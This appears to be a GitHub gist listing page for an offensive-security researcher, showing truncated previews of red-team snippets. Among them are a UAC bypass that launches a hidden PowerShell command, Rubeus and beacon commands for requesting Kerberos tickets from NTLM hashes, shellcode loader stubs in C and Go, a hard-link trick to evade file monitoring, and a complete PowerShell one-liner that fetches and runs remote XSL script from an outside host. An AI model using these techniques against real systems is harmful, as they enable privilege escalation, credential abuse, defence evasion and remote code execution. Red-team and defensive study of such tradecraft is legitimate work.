Mariusz B. (mgeeky)
mgeeky / bh_split2.py
Created May 25, 2021 — forked from Acebond/bh_split2.py
Split large SharpHound datasets (JSON files) into smaller files that can more easily be imported into BloodHound. Especially useful due to the Electron memory limitations.
#!/usr/bin/python3
# Based on https://gist.github.com/deltronzero/7c23bacf97b4b61c7a2f2950ef6f35d8
# pip install simplejson
import simplejson
import sys

def splitfile(file_name, object_limit):
    print(f"[*] Loading {file_name}")
    with open(file_name) as f:
        data = simplejson.load(f)
mgeeky / uac-silentcleanupbypass.ps1
Created May 12, 2021
UAC Bypass: SilentCleanup (Win10 1903+). Leaves powershell.exe running with nasty command line: (powershell -w hidden -c "& 'C:\your\evil\command.exe'";#\system32\werfault.exe)
function UAC-SilentCleanupBypass {
    param(
        [Parameter(Mandatory = $True)]
        [String]$Command
    )
    $assemblies=(
        "System"
    )
mgeeky / gist:ec8fabcf28678eb99646a10d3752884f
MATCH (u:User)-[r:AdminTo|MemberOf*1..]->(c:Computer)
RETURN u.name
That'll return a list of users who have admin rights on at least one system, either explicitly or through group membership.
---------------
MATCH
(U:User)-[r:MemberOf|:AdminTo*1..]->(C:Computer)
WITH
U.name as n,
mgeeky / gist:6adb2c09abcef8d86b2eb0adfcab5692
##### IF ELEVATED:
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
mgeeky / Get-AntiVirusProduct.ps1
Created Jan 14, 2021
Lists installed AntiVirus products and their details. Source: https://stackoverflow.com/a/37842942
function Get-AntiVirusProduct {
    [CmdletBinding()]
    param (
        [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)]
        [Alias('name')]
        $computername=$env:computername
    )
mgeeky / hexdump.py
Created Jan 3, 2021
Hexdump implementation in Python
def hexdump(data, addr=0, num=0):
    s = ''
    n = 0
    lines = []
    if num == 0:
        num = len(data)
    if len(data) == 0:
        return '<empty>'
    for i in range(0, num, 16):
mgeeky / shellcodeLoader.c
Last active Jan 26, 2021
Simplest Windows shellcode loader there can be, purely in C
#include <stdio.h>
#include <stdlib.h>
#define WIN32_LEAN_AND_MEAN
#include <windows.h>

int main(int argc, char **argv) {
    if (argc != 2) {
        printf("Usage: ./shellcodeLoader <shellcode64>\n");
        return 1;
    }
mgeeky / shellcodeLoader.go
Created May 13, 2020
Simple Shellcode loader implemented in Golang
//
// Simple Shellcode loader implemented in Golang.
//
// Compilation:
// $ go build -o foo.exe shellcodeLoader.go
//
// Mariusz B. / mgeeky (@mariuszbit), '20
// <mb@binary-offensive.com>
//
mgeeky / Update_Notes.md
Created Apr 30, 2020
You have found THE coolest gist :) Come to DerbyCon to learn more. Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

mgeeky / PowerShell.txt
Created Apr 30, 2020
Snippets of PowerShell bypass/evasion/execution techniques that are interesting
##############################################################################
### Powershell Xml/Xsl Assembly "Fetch & Execute"
### [https://twitter.com/bohops/status/966172175555284992]
$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;
##############################################################################
### Powershell VBScript Assembly SCT "Fetch & Execute"
### [https://twitter.com/bohops/status/965670898379476993]